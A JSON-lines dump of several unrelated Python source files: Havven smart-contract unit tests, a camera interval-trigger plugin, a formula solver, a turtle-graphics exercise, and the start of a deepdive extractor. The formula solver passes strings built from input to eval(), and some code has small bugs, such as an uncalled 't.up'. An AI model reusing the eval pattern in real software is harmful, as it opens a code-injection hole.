self.havven.recomputeLastAverageBalance(carol, carol)\n\n total_average = self.havven.issuanceLastAverageBalance(alice) + \\\n self.havven.issuanceLastAverageBalance(bob) + \\\n self.havven.issuanceLastAverageBalance(carol)\n\n self.assertClose(UNIT, total_average, precision=3)\n\n # lastModified - tested above\n # hasWithdrawnFees - tested in test_FeeCollection.py\n # lastFeesCollected - tested in test_FeeCollection.py\n\n ###\n # Contract variables\n ###\n # feePeriodStartTime - tested above\n # feePeriodDuration - tested above\n # MIN_FEE_PERIOD_DURATION - constant, checked in constructor test\n\n ###\n # Functions\n ###\n\n # setNomin\n def test_setNomin(self):\n alice = fresh_account()\n self.havven.setNomin(MASTER, alice)\n self.assertEqual(self.havven.nomin(), alice)\n\n def test_invalidSetNomin(self):\n alice = fresh_account()\n self.assertReverts(self.havven.setNomin, alice, alice)\n\n # setEscrow\n def test_setEscrow(self):\n alice = fresh_account()\n self.havven.setEscrow(MASTER, alice)\n self.assertEqual(self.havven.escrow(), alice)\n\n def test_invalidSetEscrow(self):\n alice = fresh_account()\n self.assertReverts(self.havven.setEscrow, alice, alice)\n\n # setIssuanceRatio\n def test_setIssuanceRatio(self):\n self.havven.setIssuanceRatio(MASTER, 3 * UNIT // 10)\n self.assertEqual(self.havven.issuanceRatio(), 3 * UNIT // 10)\n\n def test_setIssuanceRatio_max(self):\n self.havven.setIssuanceRatio(MASTER, self.havven.MAX_ISSUANCE_RATIO())\n self.assertReverts(self.havven.setIssuanceRatio, MASTER, self.havven.MAX_ISSUANCE_RATIO() + 1)\n\n # setFeePeriodDuration\n def test_setFeePeriodDuration(self):\n self.havven.setFeePeriodDuration(MASTER, to_seconds(weeks=10))\n self.assertEqual(\n self.havven.feePeriodDuration(),\n to_seconds(weeks=10)\n )\n\n def test_setFeePeriodDuration_max(self):\n sixmonths = 26 * 7 * 24 * 60 * 60\n self.assertReverts(self.havven.setFeePeriodDuration, MASTER, 2 ** 256 - 1)\n self.assertReverts(self.havven.setFeePeriodDuration, MASTER, sixmonths + 1)\n self.havven.setFeePeriodDuration(MASTER, sixmonths)\n self.assertEqual(\n self.havven.feePeriodDuration(),\n sixmonths\n )\n\n def test_setFeePeriodDuration_min(self):\n self.havven.setFeePeriodDuration(MASTER, self.havven.MIN_FEE_PERIOD_DURATION())\n self.assertEqual(\n self.havven.feePeriodDuration(),\n self.havven.MIN_FEE_PERIOD_DURATION()\n )\n\n def test_setFeePeriodDuration_invalid_below_min(self):\n self.assertReverts(self.havven.setFeePeriodDuration, MASTER, self.havven.MIN_FEE_PERIOD_DURATION() - 1)\n\n def test_setFeePeriodDuration_invalid_0(self):\n self.assertReverts(self.havven.setFeePeriodDuration, MASTER, self.havven.MIN_FEE_PERIOD_DURATION() - 1)\n\n # endow\n def test_endow_valid(self):\n amount = 50 * UNIT\n havven_balance = self.havven.balanceOf(self.havven_contract.address)\n alice = fresh_account()\n self.assertEqual(self.havven.balanceOf(alice), 0)\n self.havven.endow(MASTER, alice, amount)\n self.assertEqual(self.havven.balanceOf(alice), amount)\n self.assertEqual(havven_balance - self.havven.balanceOf(self.havven_contract.address), amount)\n\n def test_endow_0(self):\n amount = 0\n havven_balance = self.havven.balanceOf(self.havven_contract.address)\n alice = fresh_account()\n self.assertEqual(self.havven.balanceOf(alice), 0)\n self.havven.endow(MASTER, alice, amount)\n self.assertEqual(self.havven.balanceOf(alice), amount)\n self.assertEqual(havven_balance - self.havven.balanceOf(self.havven_contract.address), amount)\n\n def test_endow_supply(self):\n amount = self.havven.totalSupply()\n havven_balance = self.havven.balanceOf(self.havven_contract.address)\n alice = fresh_account()\n self.assertEqual(self.havven.balanceOf(alice), 0)\n self.havven.endow(MASTER, alice, amount)\n self.assertEqual(self.havven.balanceOf(alice), amount)\n self.assertEqual(havven_balance - self.havven.balanceOf(self.havven_contract.address), amount)\n\n def test_endow_more_than_supply(self):\n amount = self.havven.totalSupply() * 2\n alice = fresh_account()\n self.assertReverts(self.havven.endow, MASTER, alice, amount)\n self.assertEqual(self.havven.balanceOf(alice), 0)\n\n def test_endow_invalid_sender(self):\n amount = 50 * UNIT\n alice = fresh_account()\n self.assertReverts(self.havven.endow, alice, alice, amount)\n self.assertEqual(self.havven.balanceOf(alice), 0)\n\n def test_endow_contract_sender(self):\n amount = 50 * UNIT\n alice = fresh_account()\n self.assertReverts(self.havven.endow, self.havven.contract.address, alice, amount)\n self.assertEqual(self.havven.balanceOf(alice), 0)\n\n def test_endow_to_contract(self):\n amount = 50 * UNIT\n self.assertEqual(self.havven.balanceOf(self.havven_contract.address), self.havven.totalSupply())\n self.havven.endow(MASTER, self.havven_contract.address, amount)\n self.assertEqual(self.havven.balanceOf(self.havven_contract.address), self.havven.totalSupply())\n self.havven.endow(MASTER, self.havven_contract.address, amount)\n\n def test_endow_transfers(self):\n alice = fresh_account()\n tx_receipt = self.havven.endow(MASTER, alice, 50 * UNIT)\n event = get_event_data_from_log(self.havven_event_dict, tx_receipt.logs[0])\n self.assertEqual(event['event'], 'Transfer')\n\n # transfer\n def test_transferRollsOver(self):\n alice = fresh_account()\n self.havven.endow(MASTER, alice, 50 * UNIT)\n fast_forward(seconds=self.havven.feePeriodDuration() + 100)\n self.havven.transfer(alice, MASTER, 25 * UNIT)\n tx_receipt = self.havven.rolloverFeePeriodIfElapsed(MASTER)\n\n event = get_event_data_from_log(self.havven_event_dict, tx_receipt.logs[0])\n self.assertEqual(event['event'], 'FeePeriodRollover')\n\n # same as test_ExternStateToken\n def test_transfer(self):\n sender, receiver, no_tokens = fresh_accounts(3)\n self.havven.endow(MASTER, sender, 50 * UNIT)\n sender_balance = self.havven.balanceOf(sender)\n\n receiver_balance = self.havven.balanceOf(receiver)\n self.assertEqual(receiver_balance, 0)\n\n value = 10 * UNIT\n total_supply = self.havven.totalSupply()\n\n # This should fail because receiver has no tokens\n self.assertReverts(self.havven.transfer, receiver, sender, value)\n\n self.havven.transfer(sender, receiver, value)\n self.assertEqual(self.havven.balanceOf(receiver), receiver_balance + value)\n self.assertEqual(self.havven.balanceOf(sender), sender_balance - value)\n\n # transfers should leave the supply unchanged\n self.assertEqual(self.havven.totalSupply(), total_supply)\n\n value = 1001 * UNIT\n # This should fail because balance < value and balance > totalSupply\n self.assertReverts(self.havven.transfer, sender, receiver, value)\n\n # 0 value transfers are allowed.\n value = 0\n pre_sender_balance = self.havven.balanceOf(sender)\n pre_receiver_balance = self.havven.balanceOf(receiver)\n self.havven.transfer(sender, receiver, value)\n self.assertEqual(self.havven.balanceOf(receiver), pre_receiver_balance)\n self.assertEqual(self.havven.balanceOf(sender), pre_sender_balance)\n\n # It is also possible to send 0 value transfer from an account with 0 balance.\n self.assertEqual(self.havven.balanceOf(no_tokens), 0)\n self.havven.transfer(no_tokens, receiver, value)\n self.assertEqual(self.havven.balanceOf(no_tokens), 0)\n\n # transferFrom\n def test_transferFromRollsOver(self):\n alice = fresh_account()\n self.havven.endow(MASTER, alice, 50 * UNIT)\n self.havven.approve(alice, MASTER, 25 * UNIT)\n fast_forward(seconds=self.havven.feePeriodDuration() + 100)\n self.havven.transferFrom(MASTER, alice, MASTER, 25 * UNIT)\n tx_receipt = self.havven.rolloverFeePeriodIfElapsed(MASTER)\n\n event = get_event_data_from_log(self.havven_event_dict, tx_receipt.logs[0])\n self.assertEqual(event['event'], 'FeePeriodRollover')\n\n def test_transferFrom(self):\n approver, spender, receiver, no_tokens = fresh_accounts(4)\n\n self.havven.endow(MASTER, approver, 50 * UNIT)\n\n approver_balance = self.havven.balanceOf(approver)\n spender_balance = self.havven.balanceOf(spender)\n receiver_balance = self.havven.balanceOf(receiver)\n\n value = 10 * UNIT\n total_supply = self.havven.totalSupply()\n\n # This fails because there has been no approval yet\n self.assertReverts(self.havven.transferFrom, spender, approver, receiver, value)\n\n self.havven.approve(approver, spender, 2 * value)\n self.assertEqual(self.havven.allowance(approver, spender), 2 * value)\n\n self.assertReverts(self.havven.transferFrom, spender, approver, receiver, 2 * value + 1)\n self.havven.transferFrom(spender, approver, receiver, value)\n\n self.assertEqual(self.havven.balanceOf(approver), approver_balance - value)\n self.assertEqual(self.havven.balanceOf(spender), spender_balance)\n self.assertEqual(self.havven.balanceOf(receiver), receiver_balance + value)\n self.assertEqual(self.havven.allowance(approver, spender), value)\n self.assertEqual(self.havven.totalSupply(), total_supply)\n\n # Empty the account\n self.havven.transferFrom(spender, approver, receiver, value)\n\n # This account has no tokens\n approver_balance = self.havven.balanceOf(no_tokens)\n self.assertEqual(approver_balance, 0)\n self.assertEqual(self.havven.allowance(no_tokens, spender), 0)\n\n self.havven.approve(no_tokens, spender, value)\n self.assertEqual(self.havven.allowance(no_tokens, spender), value)\n\n # This should fail because the approver has no tokens.\n self.assertReverts(self.havven.transferFrom, spender, no_tokens, receiver, value)\n\n def test_double_withdraw_fee(self):\n alice = fresh_account()\n self.havven.withdrawFees(alice)\n self.assertReverts(self.havven.withdrawFees, alice)\n\n def test_withdraw_multiple_periods(self):\n alice = fresh_account()\n self.havven.withdrawFees(alice)\n fast_forward(self.havven.feePeriodDuration() * 2)\n self.havven.rolloverFeePeriodIfElapsed(DUMMY)\n self.havven.withdrawFees(alice)\n fast_forward(self.havven.feePeriodDuration() * 2)\n self.havven.rolloverFeePeriodIfElapsed(DUMMY)\n\n # adjustFeeEntitlement - tested above\n # rolloverFee - tested above, indirectly\n\n # withdrawFees - tested in test_FeeCollection.py\n\n def test_selfDestruct(self):\n owner = self.havven.owner()\n notowner = DUMMY\n self.assertNotEqual(owner, notowner)\n\n # The contract cannot be self-destructed before the SD has been initiated.\n self.assertReverts(self.unproxied_havven.selfDestruct, owner)\n\n tx = self.unproxied_havven.initiateSelfDestruct(owner)\n self.assertEventEquals(self.event_map, tx.logs[0],\n \"SelfDestructInitiated\",\n {\"selfDestructDelay\": self.sd_duration},\n location=self.havven_contract.address)\n\n # Neither owners nor non-owners may not self-destruct before the time has elapsed.\n self.assertReverts(self.unproxied_havven.selfDestruct, notowner)\n self.assertReverts(self.unproxied_havven.selfDestruct, owner)\n fast_forward(seconds=self.sd_duration, days=-1)\n self.assertReverts(self.unproxied_havven.selfDestruct, notowner)\n self.assertReverts(self.unproxied_havven.selfDestruct, owner)\n fast_forward(seconds=10, days=1)\n\n # Non-owner should not be able to self-destruct even if the time has elapsed.\n self.assertReverts(self.unproxied_havven.selfDestruct, notowner)\n address = self.unproxied_havven.contract.address\n tx = self.unproxied_havven.selfDestruct(owner)\n\n self.assertEventEquals(self.event_map, tx.logs[0],\n \"SelfDestructed\",\n {\"beneficiary\": owner},\n location=self.havven_contract.address)\n # Check contract not exist \n self.assertEqual(W3.eth.getCode(address), b'\\x00')\n\n ###\n # Modifiers\n ###\n # postrolloverFeePeriodIfElapsed - tested above\n def test_rolloverFeePeriodIfElapsed_escrow_exists(self):\n fast_forward(seconds=self.havven.feePeriodDuration() + 10)\n\n pre_feePeriodStartTime = self.havven.feePeriodStartTime()\n # This should work fine.\n self.havven.rolloverFeePeriodIfElapsed(MASTER)\n self.assertGreater(self.havven.feePeriodStartTime(), pre_feePeriodStartTime)\n\n fast_forward(seconds=self.havven.feePeriodDuration() + 10)\n pre_feePeriodStartTime = self.havven.feePeriodStartTime()\n # And so should this\n self.havven.setEscrow(MASTER, ZERO_ADDRESS)\n self.havven.rolloverFeePeriodIfElapsed(MASTER)\n self.assertGreater(self.havven.feePeriodStartTime(), pre_feePeriodStartTime)\n\n def test_abuse_havven_balance(self):\n # Test whether repeatedly moving havvens between two parties will shift averages upwards\n alice = fresh_account()\n amount = UNIT * 100000\n self.havven_updatePrice(MASTER, UNIT, block_time() + 1)\n self.havven.setIssuer(MASTER, alice, True)\n self.havven.setIssuanceRatio(MASTER, UNIT)\n a_sum = 0\n self.havven.endow(MASTER, alice, amount)\n self.assertEqual(self.havven.balanceOf(alice), amount)\n self.assertEqual(self.havven.issuanceCurrentBalanceSum(alice), 0)\n for i in range(20):\n self.havven.issueNomins(alice, amount)\n t = block_time()\n self.assertEqual(self.nomin.balanceOf(alice), amount)\n self.assertEqual(self.havven.issuanceCurrentBalanceSum(alice), a_sum)\n self.havven.burnNomins(alice, amount)\n a_sum += (block_time() - t) * amount\n self.assertEqual(self.nomin.balanceOf(alice), 0)\n self.assertEqual(self.havven.issuanceCurrentBalanceSum(alice), a_sum)\n\n def test_event_PriceUpdated(self):\n time = block_time()\n tx = self.havven_updatePrice(self.havven.oracle(), 10 * UNIT, time)\n self.assertEventEquals(self.event_map,\n tx.logs[0], \"PriceUpdated\",\n {\"newPrice\": 10 * UNIT,\n \"timestamp\": time},\n self.havven_proxy.address)\n\n def test_event_IssuanceRatioUpdated(self):\n new_ratio = UNIT // 12\n tx = self.havven.setIssuanceRatio(MASTER, new_ratio)\n self.assertEventEquals(self.event_map,\n tx.logs[0], \"IssuanceRatioUpdated\",\n {\"newRatio\": new_ratio},\n self.havven_proxy.address)\n\n def test_event_FeePeriodRollover(self):\n fee_period = self.havven.feePeriodDuration()\n fast_forward(fee_period + 10) \n tx = self.havven.rolloverFeePeriodIfElapsed(MASTER)\n time = block_time(tx.blockNumber)\n self.assertEventEquals(self.event_map,\n tx.logs[0], \"FeePeriodRollover\",\n {\"timestamp\": time},\n self.havven_proxy.address)\n\n def test_event_FeePeriodDurationUpdated(self):\n new_duration = 19 * 24 * 60 * 60\n tx = self.havven.setFeePeriodDuration(MASTER, new_duration)\n self.assertEventEquals(self.event_map,\n tx.logs[0], \"FeePeriodDurationUpdated\",\n {\"duration\": new_duration},\n self.havven_proxy.address)\n\n def test_event_FeesWithdrawn(self):\n issuer = fresh_account()\n fee_rate = self.nomin.transferFeeRate()\n fee_period = self.havven.feePeriodDuration()\n self.havven.endow(MASTER, issuer, 2 * UNIT)\n self.havven_updatePrice(self.havven.oracle(), UNIT, block_time())\n self.havven.setIssuanceRatio(MASTER, UNIT)\n self.havven.setIssuer(MASTER, issuer, True)\n self.havven.issueNomins(issuer, 2 * UNIT)\n fast_forward(fee_period + 100)\n self.havven.rolloverFeePeriodIfElapsed(MASTER)\n self.nomin.transferSenderPaysFee(issuer, issuer, UNIT)\n fast_forward(fee_period + 100)\n tx = self.havven.withdrawFees(issuer)\n self.assertEventEquals(self.event_map,\n tx.logs[3], \"FeesWithdrawn\",\n {\"account\": issuer,\n \"value\": fee_rate},\n self.havven_proxy.address)\n\n def test_event_OracleUpdated(self):\n new_oracle = fresh_account()\n self.assertNotEqual(MASTER, new_oracle)\n tx = self.havven.setOracle(MASTER, new_oracle)\n self.assertEventEquals(self.event_map,\n tx.logs[0], \"OracleUpdated\",\n {\"newOracle\": new_oracle},\n self.havven_proxy.address)\n\n def test_event_NominUpdated(self):\n new_nomin = fresh_account()\n self.assertNotEqual(MASTER, new_nomin)\n tx = self.havven.setNomin(MASTER, new_nomin)\n self.assertEventEquals(self.event_map,\n tx.logs[0], \"NominUpdated\",\n {\"newNomin\": new_nomin},\n self.havven_proxy.address)\n\n def test_event_EscrowUpdated(self):\n new_escrow = fresh_account()\n self.assertNotEqual(MASTER, new_escrow)\n tx = self.havven.setEscrow(MASTER, new_escrow)\n self.assertEventEquals(self.event_map,\n tx.logs[0], \"EscrowUpdated\",\n {\"newEscrow\": new_escrow},\n self.havven_proxy.address)\n\n def test_event_IssuersUpdated(self):\n new_issuer = fresh_account()\n self.assertNotEqual(MASTER, new_issuer)\n tx = self.havven.setIssuer(MASTER, new_issuer, True)\n self.assertEventEquals(self.event_map,\n tx.logs[0], \"IssuersUpdated\",\n {\"account\": new_issuer,\n \"value\": True},\n self.havven_proxy.address)\n tx = self.havven.setIssuer(MASTER, new_issuer, False)\n self.assertEventEquals(self.event_map,\n tx.logs[0], \"IssuersUpdated\",\n {\"account\": new_issuer,\n \"value\": False},\n self.havven_proxy.address)\n","sub_path":"ERC20/Havven/tests/test_Havven.py","file_name":"test_Havven.py","file_ext":"py","file_size_in_byte":40716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"178716119","text":"import logging\nimport threading\nimport time\n\nfrom spreads.plugin import HookPlugin, PluginOption, TriggerHooksMixin\n\nlogger = logging.getLogger('spreadsplug.intervaltrigger')\n\n\nclass IntervalTrigger(HookPlugin, TriggerHooksMixin):\n __name__ = 'intervaltrigger'\n\n _loop_thread = None\n _exit_event = None\n\n @classmethod\n def configuration_template(cls):\n return {'interval': PluginOption(5.0, \"Interval between captures\"\n \" (in seconds)\")}\n\n def start_trigger_loop(self, capture_callback):\n logger.debug(\"Starting event loop\")\n self._exit_event = threading.Event()\n self._loop_thread = threading.Thread(target=self._trigger_loop,\n args=(capture_callback, ))\n self._loop_thread.start()\n\n def stop_trigger_loop(self):\n logger.debug(\"Stopping event loop\")\n self._exit_event.set()\n self._loop_thread.join()\n\n def _trigger_loop(self, capture_func):\n interval = self.config['interval'].get(float)\n while True:\n sleep_time = 0\n while sleep_time < interval:\n if self._exit_event.is_set():\n return\n time.sleep(0.01)\n sleep_time += 0.01\n capture_func()\n","sub_path":"spreadsplug/intervaltrigger.py","file_name":"intervaltrigger.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"79116156","text":"# important functions\n# compile_value_unit\n# solve_formula\n\nimport sys\nimport os\nimport re\nimport string\nimport random\nimport itertools\nfrom collections import namedtuple\n\nfrom treelib import Tree\n\nfrom Formulate.value_unit_interpreter import get_value, get_units_string, _remove_spaces\n\nimport Formulate.settings as settings\n\nfrom Formulate.re_search_extensions import re_search_better, re_findall_better, find_all_indexes\nfrom Formulate.re_builders import quotes, pos_lookahead, parentheses, pos_lookbehind, combine_re_expressions\n\n\n# finds the first full component in formulas contained in within opener and closer\n# if there are no openers/closers returns None\n# returns a dictionary that contains\n# leading (before first opener),\n# within (inbetween first opener and corrisponding closer),\n# and trailing (after the corrisponding closer)\n# error checks\n# equal numbers of openers and closers\ndef split_formula(formula, opener='(', closer=')'):\n openers = find_all_indexes(opener, formula)\n closers = find_all_indexes(closer, formula)\n if len(openers) != len(closers):\n raise ValueUnitsError('The number of openers and closers is not equal.')\n if len(openers) == 0:\n return None\n if openers[0] > closers[0]:\n raise ValueUnitsError('Index of first opener before index of first closer.')\n\n # o_index is the index in openers\n # c_index is the index in closers\n if len(openers) == 1:\n # because there is only one possible index for the opener and closer\n c_index = 0\n else:\n # traverses the openers and closers to make sure that there are no conflicts like ())(()\n counter = 1\n o_index = 0\n c_index = 0\n while counter > 0:\n if o_index == len(openers) - 1 and openers[o_index] < closers[c_index]:\n c_index += 1\n counter -= 1\n elif not (openers[o_index] < closers[c_index] < openers[o_index + 1]):\n o_index += 1\n counter += 1\n elif openers[o_index] < closers[c_index] < openers[o_index + 1]:\n c_index += 1\n counter -=1\n else:\n raise ValueUnitsError('Unknown Error.')\n c_index -= 1\n openers = openers[0]\n closers = closers[c_index]\n return {'leading': formula[:openers],\n 'within': formula[openers+1:closers],\n 'trailing': formula[closers+1:]}\n\n\n# creates a string of length length that has no matches with the regular expression pattern re_pattern\n# tries to find a non-matching string max_attempts times. If a non-matching string cannot be found a ValueUnitsError is raised\n# returned string used as a placeholder for to replace a sub-formula contained in brackets with a variable\n# used in abstract_brackets\ndef no_re_matches(re_pattern, length=5, max_attempts = 100):\n for count in range(max_attempts):\n try_string = ''.join(random.choice(string.ascii_letters) for x in range(length))\n if re_search_better(re_pattern, try_string) is None:\n return try_string\n raise ValueUnitsError('Non-matching pattern cannot be found')\n\n\n# abstracts the sub-formula contained in parentheses to a unique variable name\n# if there are any variables already in formula they need to be selected by the re pattern variables_re so that duplicate variable names are not created\n# returns the formula with all the new variables in it and a dictionary with the new variables as keys and the origional expression as the values\ndef abstract_brackets(formula, variables_re=''):\n lwt = split_formula(formula)\n new_variables = {}\n while lwt:\n substitute = no_re_matches(combine_re_expressions(\n itertools.chain((variables_re,), new_variables.keys())\n ))\n formula = lwt['leading'] + substitute + lwt['trailing']\n new_variables[substitute] = lwt['within']\n lwt = split_formula(formula)\n if formula in new_variables.keys():\n # incase of extranous brackets\n return abstract_brackets(new_variables[formula], variables_re)\n # return [formula, new_variables]\n return namedtuple('abstract_brackets', ('formula', 'new_variables'))(formula, new_variables)\n\n\n# splits formula into 2 parts (leading and trailing) where the operator (from settings.order_of_operations) with the lowest priority is\n# if there are no operators in formula returns None\ndef split_operands(formula, variables_re=''):\n formula = _remove_spaces(formula)\n non_inclusive_re = pos_lookahead(combine_re_expressions([variables_re, settings.re_value_unit, settings.re_positive_number]))\n # for op in order_of_operations:\n for op in reversed(settings.formula_operators):\n if 'exponential' in settings.formula_operators[op].keys():\n # special selection settings of the exponent operator\n # this method should be defined in the settings.formula_operators\n # need to label the individual lines in this if statement because I can't remember what specific cases they are for\n # error does not select negitive exponents\n variable_and_operator = re_search_better(\n combine_re_expressions((\n parentheses(combine_re_expressions((variables_re, '\\\\)'))) + settings.re_exponent_operator,\n parentheses(settings.re_positive_number) + settings.re_exponent_operator\n )),\n formula\n )\n if variable_and_operator is not None:\n variable = variable_and_operator.replace(op, '')\n if variable == ')':\n variable = '\\)'\n re_pattern = pos_lookbehind(variable) + settings.re_exponent_operator\n else:\n continue\n else:\n re_pattern = settings.formula_operators[op]['re_selector'] + non_inclusive_re\n\n selected = re.search(re_pattern, formula)\n if selected:\n # return {'leading': formula[:selected.start()],\n # 'operator': formula[selected.start():selected.end()],\n # 'trailing': formula[selected.end():]}\n return namedtuple('split_operands', ('leading', 'operator', 'trailing'))(\n formula[:selected.start()],\n formula[selected.start():selected.end()],\n formula[selected.end():]\n )\n # ooo = leading_operator_trailing(formula, re_pattern)\n # if ooo:\n # return ooo\n return None\n\n\n# if there are un-needed or extra brackets (defined by opener and closer) at the beginning or end of the formula string they are removed\ndef remove_outside_extranous_parenthesis(formula, opener='(', closer=')'):\n if formula == '':\n return formula\n if formula[0] != opener or formula[-1] != closer:\n return formula\n less_formula = formula[1:-1]\n if split_formula(formula, opener, closer)['within'] == less_formula:\n return remove_outside_extranous_parenthesis(less_formula, opener, closer)\n return formula\n\n\n# helper function for formula_order below\ndef formula_order_helper(formula, variables_re, full_tree, node_id):\n # only_operators_variables_value_units = abstract_brackets(formula, variables_re)\n new_formula, new_variables = abstract_brackets(formula, variables_re)\n all_variables_re = combine_re_expressions([variables_re] + list(new_variables.keys()))\n\n operands_operator = split_operands(new_formula, all_variables_re)\n current_node = full_tree.get_node(node_id)\n\n if operands_operator:\n # leading = operands_operator['leading']\n leading = operands_operator.leading\n # trailing = operands_operator['trailing']\n trailing = operands_operator.trailing\n for nv in list(new_variables.keys()):\n leading = remove_outside_extranous_parenthesis(\n leading.replace(nv, parentheses(new_variables[nv]))\n )\n trailing = remove_outside_extranous_parenthesis(\n trailing.replace(nv, parentheses(new_variables[nv]))\n )\n\n # current_node.data['operator'] = operands_operator['operator']\n current_node.data['operator'] = operands_operator.operator\n full_tree.create_node(tag=leading, parent=node_id, data={'execution_order': 'leading', 'formula': leading})\n full_tree.create_node(tag=trailing, parent=node_id, data={'execution_order': 'trailing', 'formula': trailing})\n formula_order_helper(leading, variables_re, full_tree, current_node.fpointer[0])\n formula_order_helper(trailing, variables_re, full_tree, current_node.fpointer[1])\n\n elif operands_operator is None: current_node.data['formula'] = formula\n else: raise ValueUnitsError('Unknown operands_operator.')\n\n\n# creates a tree data structure that holds the values and variables in respect to their order of operation\n# variable_names can be a string, iterable (includes list and tuple)\ndef formula_order(formula, variable_names=''):\n formula = _remove_spaces(formula)\n if isinstance(variable_names, str):\n variable_names = [variable_names]\n\n formula_tree = Tree()\n formula_tree.create_node(tag=formula, data={})\n formula_order_helper(formula, combine_re_expressions(variable_names), formula_tree, formula_tree.root)\n return formula_tree\n\n# converts the string unit_string to Pint units\ndef compile_unit(unit_string):\n unit_string = get_units_string(unit_string)\n for uus in settings.unaccepted_unit_symbols.keys():\n unit_string = unit_string.replace(uus, settings.unaccepted_unit_symbols[uus])\n\n parted_units = ['settings.ureg' + parentheses(quotes(us)) for us in re.split(settings.re_unit_operators, unit_string)]\n parted_operator = re_findall_better(settings.re_unit_operators, unit_string)\n eval_string = parted_units[0]\n for count in range(len(parted_operator)):\n eval_string += parted_operator[count] + parted_units[count + 1]\n return eval(eval_string)\n\n\n# converts the string to a Pint quantity object\n# works with only units and no math\ndef compile_value_unit(value_with_units):\n value = get_value(value_with_units)\n if value is None: value = 1\n return value * compile_unit(value_with_units)\n\n\n# vu = value unit\n# iterates over all leaves solving for each leaf's value\ndef set_iterate_over_leaves(formula_tree, compile_vu_function):\n # fill in leaves\n # for leaf_node in (formula_tree.get_node(leaf_id) for leaf_id in formula_tree.leaves(formula_tree.root)):\n for leaf_node in formula_tree.leaves():\n\n vu = compile_vu_function(leaf_node)\n leaf_node.data['solution'] = vu\n\n # .bpointer gets id of parent node\n if leaf_node.bpointer is not None:\n parent_node = formula_tree.get_node(leaf_node.bpointer)\n # if leaf_node.data['execution_order'] == 'leading':\n # parent_node.data['leading'] = vu\n # elif leaf_node.data['execution_order'] == 'trailing':\n # parent_node.data['trailing'] = vu\n # else:\n # raise ValueUnitsError('Unknown execution_order')\n parent_node.data[leaf_node.data['execution_order']] = vu\n formula_tree.remove_node(leaf_node.identifier)\n\n\n# why aren't there better lambda functions? Love Javascript sometimes.\n# used to solve the formula_tree's leaves once leaf_function (defined in solve_formula_tree)\ndef node_compute(leaf_node):\n for key in ('leading', 'trailing'):\n if isinstance(leaf_node.data[key], bool):\n leaf_node.data[key] = int(leaf_node.data[key])\n\n operator_function = settings.formula_operators[leaf_node.data['operator']]['function']\n return operator_function(leaf_node.data['leading'], leaf_node.data['trailing'])\n\n\n# solves the formula defined in formula string\n# variables is a dictionary with the variables in formula string as keys and the variable's value (can have units) is the key's associated value\n# returns the calculated solution as a Pint quantity\n# includes format checking of the formula and will raise an exception if there is an error\ndef solve_formula(formula, variables={}, return_string=False):\n for key, val in variables.items():\n if not isinstance(val, settings.ureg.Quantity):\n variables[key] = compile_value_unit(val)\n\n formula_tree = formula_order(formula, variables)\n if formula_tree.size() == 1:\n single_value = formula_tree.get_node(formula_tree.root).data['formula']\n if single_value in variables.keys():\n single_value = variables[single_value]\n else:\n single_value = compile_value_unit(single_value)\n return single_value\n\n # replacing the class InitTreeLeaf\n # set_iterate_over_leaves(formula_tree, InitTreeLeaf(variables).leaf_function)\n # used to solve thi initial leaves of the formula tree\n # why aren't there better lambda functions? Love Javascript sometimes.\n def leaf_function(leaf_node):\n potential_variable_name = leaf_node.data['formula']\n if potential_variable_name in variables.keys():\n return variables[potential_variable_name]\n return compile_value_unit(potential_variable_name) # if value unit\n set_iterate_over_leaves(formula_tree, leaf_function)\n\n size = formula_tree.size()\n try_again = True\n while try_again:\n set_iterate_over_leaves(formula_tree, node_compute)\n new_size = formula_tree.size()\n try_again = size != new_size\n size = new_size\n\n solution = formula_tree.get_node(formula_tree.root).data['solution']\n return str(solution) if return_string else solution\n\n\nclass ValueUnitsError(BaseException):\n pass\n","sub_path":"Formulate/formula_solver.py","file_name":"formula_solver.py","file_ext":"py","file_size_in_byte":12900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"225620744","text":"import turtle\ns = turtle.Screen()\nt = turtle.Turtle()\n\n# Place your code after this line\nWINDOW_HEIGHT = s.window_height()\nWINDOW_LENGTH = s.window_width()\n\nt.speed(10)\n\ndef draw_xy_plane():\n t.up()\n t.goto(0, WINDOW_HEIGHT / 2)\n t.down()\n t.goto(0, WINDOW_HEIGHT / -2)\n t.up()\n t.goto(0, 0)\n\n t.goto(WINDOW_LENGTH / -2, 0)\n t.down()\n t.goto(WINDOW_LENGTH / 2, 0)\n t.up()\n t.goto(0, 0)\n\n\ndef draw_diagonals():\n t.goto(WINDOW_HEIGHT / 2, -WINDOW_LENGTH / 2)\n t.down()\n t.goto(-WINDOW_HEIGHT / 2, WINDOW_LENGTH / 2)\n t.up\n t.goto(0, 0)\n\n t.goto(WINDOW_HEIGHT / 2, WINDOW_LENGTH / 2)\n t.down()\n t.goto(-WINDOW_HEIGHT / 2, -WINDOW_LENGTH / 2)\n t.up\n t.goto(0, 0)\n\n\ndef draw_circles():\n t.right(90)\n t.forward(10)\n t.left(90)\n t.circle(10)\n\n t.right(90)\n t.forward(20)\n t.left(90)\n t.circle(30)\n\n t.right(90)\n t.forward(40)\n t.left(90)\n t.circle(70)\n\n t.right(90)\n t.forward(40)\n t.left(90)\n t.circle(110)\n\n\ndraw_xy_plane()\ndraw_diagonals()\ndraw_circles()\n\ns.exitonclick()\n","sub_path":"Labs/lab1-students/turtle-ex1.py","file_name":"turtle-ex1.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"593509968","text":"#!/usr/bin/env python\n# -*- coding:utf8 -*-\n\nfrom deepdive import *\nimport re\nimport divlaw\nimport handle_string\nimport numpy\ndef add_underline(string):\n return string.replace(\" \",\"_\")\ndef compare(a,b):\n if len(a) > len(b):\n return -1\n elif len(a) < len(b):\n return 1\n else :\n return 0\n@tsv_extractor\n@returns(lambda\n id =\"text\",\n cont = \"text\",\n :[])\n\ndef extract(\n doc_id =\"text\",\n content=\"text\",\n phrases = \"text[]\",\n ):\n\n content = content.replace('*',' ')\n content = content.replace('_',' ')\n if phrases is None or len(phrases) == 0: \n yield [\n doc_id,\n content\n ]\n else :\n a = sorted(phrases,cmp = compare)\n for i in a:\n content = content.replace(i,add_underline(i)) \n yield [\n doc_id,\n content\n 